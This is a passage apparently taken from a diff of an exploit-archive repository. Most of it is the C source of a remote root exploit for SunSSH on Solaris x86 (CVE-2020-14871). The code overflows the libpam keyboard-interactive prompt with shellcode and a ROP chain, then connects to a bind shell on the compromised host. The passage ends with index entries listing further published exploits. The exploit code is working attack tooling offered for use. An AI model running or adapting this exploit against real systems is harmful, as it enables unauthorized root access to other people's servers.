write(sd,sockbuf,strlen(sockbuf));
|
||||
while (1) {
|
||||
FD_ZERO(&readfds);
|
||||
FD_SET(0,&readfds);
|
||||
FD_SET(sd,&readfds);
|
||||
select(255,&readfds,NULL,NULL,NULL);
|
||||
if (FD_ISSET(sd, &readfds)) {
|
||||
memset(sockbuf,0,sockbuflen);
|
||||
rcv = read(sd,sockbuf,sockbuflen);
|
||||
if (rcv <= 0) {
|
||||
printf("\e[1m\e[34m[!] connection closed by foreign host.\n\e[0m");
|
||||
exit(-1);
|
||||
}
|
||||
printf("%s",sockbuf);
|
||||
fflush(stdout);
|
||||
}
|
||||
if(FD_ISSET(0,&readfds)) {
|
||||
memset(sockbuf,0,sockbuflen);
|
||||
read(0,sockbuf,sockbuflen);
|
||||
write(sd,sockbuf,strlen(sockbuf));
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
void bindshell_setup(short port){
|
||||
oldsd = sd;
|
||||
sd = socket(AF_INET,SOCK_STREAM,0);
|
||||
sain.sin_port = htons(port);
|
||||
if(connect(sd,(struct sockaddr*)&sain,sizeof(sain))<0){
|
||||
printf("[!] fatal bind shell failed\n\e[0m");
|
||||
exit(-1);
|
||||
}
|
||||
printf("[-] connected.. enjoy :)\e[0m\n");
|
||||
spawn_shell(sd);
|
||||
}
|
||||
|
||||
void on_alarm(int signum){
|
||||
printf("[+] exploit success, handling payload...\n");
|
||||
if(ishell==0||ishell==2){
|
||||
bindshell_setup(9999);
|
||||
}
|
||||
if(ishell==1||ishell==3){
|
||||
bindshell_setup(8080);
|
||||
}
|
||||
printf("[-] exploit complete\n\e[0m");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void on_interrupt(int signum){
|
||||
printf("\e[1m\e[34m[!] interrupt caught... cleaning up\n\e[0m");
|
||||
if(sd){
|
||||
close(sd);
|
||||
}
|
||||
if(oldsd){
|
||||
close(oldsd);
|
||||
}
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void prepare_payload(){ /* bad characters are 0x20 0x09 & 0x00 */
|
||||
#define payload_size 4096
|
||||
int len = strlen(payload);
|
||||
buf = malloc(payload_size);
|
||||
char randchar = 'A';
|
||||
char* randbuf = malloc(2);
|
||||
if(!buf||!randbuf){
|
||||
printf("[!] fatal payload buffer error\n");
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(NULL));
|
||||
memset(buf,'\x00',payload_size);
|
||||
memset(randbuf,0,2);
|
||||
printf("[-] shellcode length %d bytes\n",len);
|
||||
if(len < 512 && payload_size > 1024){
|
||||
memcpy(buf,payload,len);
|
||||
for(int i =0;i <= (512 - len);i++){
|
||||
randchar = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"[random() % 52];
|
||||
memcpy(randbuf,&randchar,1);
|
||||
strcat(buf,randbuf);
|
||||
}
|
||||
len = strlen(retaddr);
|
||||
printf("[-] rop chain length %d\n",len);
|
||||
if(len + 512 < payload_size){
|
||||
memcpy((void*)(long)buf+512,(void*)retaddr,len);
|
||||
len = strlen(buf);
|
||||
printf("[-] exploit buffer length %d\n",len);
|
||||
}
|
||||
else{
|
||||
printf("[!] exploit buffer miscalculated\n");
|
||||
exit(-1);
|
||||
}
|
||||
}
|
||||
else{
|
||||
printf("[!] exploit buffer miscalculated\n");
|
||||
exit(-1);
|
||||
}
|
||||
}
|
||||
|
||||
static void kbd_callback(const char *name, int name_len,const char *instruction, int instruction_len,int num_prompts,const LIBSSH2_USERAUTH_KBDINT_PROMPT *prompts,LIBSSH2_USERAUTH_KBDINT_RESPONSE *responses, void **abstract) {
|
||||
int i = 0;
|
||||
signal(SIGALRM, &on_alarm);
|
||||
printf("[+] entering keyboard-interactive authentication.\n");
|
||||
printf("[-] number of prompts: %d\n", num_prompts);
|
||||
printf("[-] prompt %d from server: '", i);
|
||||
fwrite(prompts[i].text, 1, prompts[i].length, stdout);
|
||||
printf("'\n");
|
||||
prepare_payload();
|
||||
//uncomment to pause for gdb debugging
|
||||
//sleep(10);
|
||||
responses[i].text = strdup(buf);
|
||||
responses[i].length = strlen(buf);
|
||||
printf("[-] sending exploit magic buffer... wait\n");
|
||||
alarm(5);
|
||||
}
|
||||
|
||||
int main(int argc,char **argv){
|
||||
int ihost = 0, itarg = 0, port = 22, index = 0, rc = 0;
|
||||
char* host;
|
||||
int i, type, exitcode;
|
||||
unsigned long hostaddr;
|
||||
const char *fingerprint;
|
||||
LIBSSH2_SESSION *session;
|
||||
LIBSSH2_CHANNEL *channel;
|
||||
char *exitsignal = (char *)"none";
|
||||
size_t len;
|
||||
LIBSSH2_KNOWNHOSTS *nh;
|
||||
static struct option options[] = {
|
||||
{"server", 1, 0, 's'},
|
||||
{"port", 1, 0, 'p'},
|
||||
{"target", 1, 0, 't'},
|
||||
{"shellcode", 1, 0, 'x'},
|
||||
{"help", 0, 0,'h'}
|
||||
};
|
||||
printf("\e[1m\e[34m[+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871\n");
|
||||
while(rc != -1) {
|
||||
rc = getopt_long(argc,argv,"s:p:t:x:h",options,&index);
|
||||
switch(rc) {
|
||||
case -1:
|
||||
break;
|
||||
case 's':
|
||||
if(ihost==0){
|
||||
host = malloc(strlen(optarg) + 1);
|
||||
if(host){
|
||||
sprintf(host,"%s",optarg);
|
||||
ihost = 1;
|
||||
}
|
||||
}
|
||||
break;
|
||||
case 'p':
|
||||
port = atoi(optarg);
|
||||
break;
|
||||
case 'x':
|
||||
if(ishell==-1) {
|
||||
rc = atoi(optarg);
|
||||
switch(rc){
|
||||
case 0:
|
||||
printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
|
||||
payload = malloc(strlen(shellcodes[rc].shellcode)+1);
|
||||
if(payload){
|
||||
memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
|
||||
memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
|
||||
ishell = rc;
|
||||
}
|
||||
break;
|
||||
case 1:
|
||||
printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
|
||||
payload = malloc(strlen(shellcodes[rc].shellcode)+1);
|
||||
if(payload){
|
||||
memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
|
||||
memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
|
||||
ishell = rc;
|
||||
}
|
||||
break;
|
||||
case 2:
|
||||
printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
|
||||
payload = malloc(strlen(shellcodes[rc].shellcode)+1);
|
||||
if(payload){
|
||||
memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
|
||||
memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
|
||||
ishell = rc;
|
||||
}
|
||||
break;
|
||||
case 3:
|
||||
printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
|
||||
payload = malloc(strlen(shellcodes[rc].shellcode)+1);
|
||||
if(payload){
|
||||
memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
|
||||
memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
|
||||
ishell = rc;
|
||||
}
|
||||
break;
|
||||
|
||||
default:
|
||||
printf("[!] Invalid shellcode selection %d\n",rc);
|
||||
exit(0);
|
||||
break;
|
||||
}
|
||||
}
|
||||
break;
|
||||
case 't':
|
||||
if(itarg==0){
|
||||
rc = atoi(optarg);
|
||||
switch(rc){
|
||||
case 0:
|
||||
printf("[-] chosen target '%s'\n",targets[rc].name);
|
||||
retaddr = malloc(strlen(targets[rc].ropchain)+1);
|
||||
if(retaddr){
|
||||
memset(retaddr,0,strlen(targets[rc].ropchain)+1);
|
||||
memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
|
||||
itarg = rc;
|
||||
}
|
||||
break;
|
||||
case 1:
|
||||
printf("[-] chosen target '%s'\n",targets[rc].name);
|
||||
retaddr = malloc(strlen(targets[rc].ropchain)+1);
|
||||
if(retaddr){
|
||||
memset(retaddr,0,strlen(targets[rc].ropchain)+1);
|
||||
memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
|
||||
itarg = rc;
|
||||
}
|
||||
break;
|
||||
case 2:
|
||||
printf("[-] chosen target '%s'\n",targets[rc].name);
|
||||
retaddr = malloc(strlen(targets[rc].ropchain)+1);
|
||||
if(retaddr){
|
||||
memset(retaddr,0,strlen(targets[rc].ropchain)+1);
|
||||
memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
|
||||
itarg = rc;
|
||||
}
|
||||
break;
|
||||
case 3:
|
||||
printf("[-] chosen target '%s'\n",targets[rc].name);
|
||||
retaddr = malloc(strlen(targets[rc].ropchain)+1);
|
||||
if(retaddr){
|
||||
memset(retaddr,0,strlen(targets[rc].ropchain)+1);
|
||||
memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
|
||||
itarg = rc;
|
||||
}
|
||||
break;
|
||||
case 4:
|
||||
printf("[-] chosen target '%s'\n",targets[rc].name);
|
||||
retaddr = malloc(strlen(targets[rc].ropchain)+1);
|
||||
if(retaddr){
|
||||
memset(retaddr,0,strlen(targets[rc].ropchain)+1);
|
||||
memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
|
||||
itarg = rc;
|
||||
}
|
||||
break;
|
||||
default:
|
||||
printf("[!] Invalid target selection %d\n", rc);
|
||||
exit(0);
|
||||
break;
|
||||
}
|
||||
itarg = 1;
|
||||
}
|
||||
break;
|
||||
case 'h':
|
||||
printf("[!] Usage instructions.\n[\n");
|
||||
printf("[ %s <required> (optional)\n[\n[ --server|-s <ip/hostname>\n",argv[0]);
|
||||
printf("[ --port|-p (port)[default 22]\n[ --target|-t <target#>\n");
|
||||
printf("[ --shellcode|-x <shellcode#>\n[\n");
|
||||
printf("[ Target#'s\n");
|
||||
for(i = 0;i <= targetno - 1;i++){
|
||||
printf("[ %d \"%s\"\n",i,targets[i]);
|
||||
}
|
||||
printf("[\n[ Shellcode#'s\n");
|
||||
for(i = 0;i <= shellno - 1;i++){
|
||||
printf("[ %d \"%s\" (length %d bytes)\n",i,shellcodes[i].name,strlen(shellcodes[i].shellcode));
|
||||
}
|
||||
printf("\e[0m");
|
||||
exit(0);
|
||||
break;
|
||||
default:
|
||||
break;
|
||||
}
|
||||
}
|
||||
if(itarg != 1 || ihost != 1 || ishell < 0){
|
||||
printf("[!] error, insufficient arguments, try running '%s --help'\e[0m\n",argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
rc = libssh2_init(0);
|
||||
hostaddr = inet_addr(host);
|
||||
sd = socket(AF_INET, SOCK_STREAM, 0);
|
||||
sain.sin_family = AF_INET;
|
||||
sain.sin_port = htons(port);
|
||||
sain.sin_addr.s_addr = hostaddr;
|
||||
if(connect(sd, (struct sockaddr*)(&sain),sizeof(struct sockaddr_in)) != 0) {
|
||||
fprintf(stderr, "[!] failed to connect!\n");
|
||||
goto shutdown;
|
||||
}
|
||||
session = libssh2_session_init();
|
||||
libssh2_session_set_blocking(session, 1);
|
||||
while((rc = libssh2_session_handshake(session, sd))==LIBSSH2_ERROR_EAGAIN);
|
||||
if(rc) {
|
||||
printf("[!] failure establishing ssh session: %d\n", rc);
|
||||
goto shutdown;
|
||||
}
|
||||
nh = libssh2_knownhost_init(session);
|
||||
if(!nh) {
|
||||
printf("[!] failure on libssh2 init\n");
|
||||
goto shutdown;
|
||||
}
|
||||
fingerprint = libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1);
|
||||
printf("[+] ssh host fingerprint: ");
|
||||
for(i = 0; i < 20; i++) {
|
||||
printf("%02x", (unsigned char)fingerprint[i]);
|
||||
}
|
||||
printf("\n");
|
||||
libssh2_knownhost_free(nh);
|
||||
signal(SIGINT,&on_interrupt);
|
||||
libssh2_userauth_keyboard_interactive(session, "", &kbd_callback);
|
||||
printf("[!] exploit failed, core maybe on target!\n");
|
||||
shutdown:
|
||||
if(sd){
|
||||
close(sd);
|
||||
}
|
||||
printf("\e[0m");
|
||||
return -2;
|
||||
}
|
|
@ -11231,6 +11231,7 @@ id,file,description,date,author,type,platform,port
|
|||
49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Thomas Sluyter",local,multiple,
|
||||
49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
|
||||
49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,
|
||||
49259,exploits/linux/local/49259.c,"libbabl 0.1.62 - Broken Double Free Detection (PoC)",2020-12-15,"Carter Yagemann",local,linux,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -18340,6 +18341,7 @@ id,file,description,date,author,type,platform,port
|
|||
49216,exploits/windows/remote/49216.py,"SmarterMail Build 6985 - Remote Code Execution",2020-12-09,1F98D,remote,windows,
|
||||
49217,exploits/windows/remote/49217.py,"Dup Scout Enterprise 10.0.18 - 'sid' Remote Buffer Overflow (SEH)",2020-12-09,"Andrés Roldán",remote,windows,
|
||||
49218,exploits/windows/remote/49218.txt,"Huawei HedEx Lite 200R006C00SPC005 - Path Traversal",2020-12-09,Vulnerability-Lab,remote,windows,
|
||||
49261,exploits/solaris/remote/49261.c,"Solaris SunSSH 11.0 x86 - libpam Remote Root",2020-12-15,"Hacker Fantastic",remote,solaris,
|
||||
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -43476,3 +43478,6 @@ id,file,description,date,author,type,platform,port
|
|||
49255,exploits/multiple/webapps/49255.txt,"Rumble Mail Server 0.51.3135 - 'username' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
|
||||
49256,exploits/hardware/webapps/49256.py,"Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation",2020-12-14,"Maximilian Barz",webapps,hardware,
|
||||
49257,exploits/ruby/webapps/49257.py,"Gitlab 11.4.7 - Remote Code Execution",2020-12-14,"Fortunato Lodari",webapps,ruby,
|
||||
49258,exploits/php/webapps/49258.txt,"Task Management System 1.0 - 'page' Local File Inclusion",2020-12-15,"İsmail BOZKURT",webapps,php,
|
||||
49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)",2020-12-15,"Andrea Bruschi",webapps,php,
|
||||
49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware,
|
||||
|
|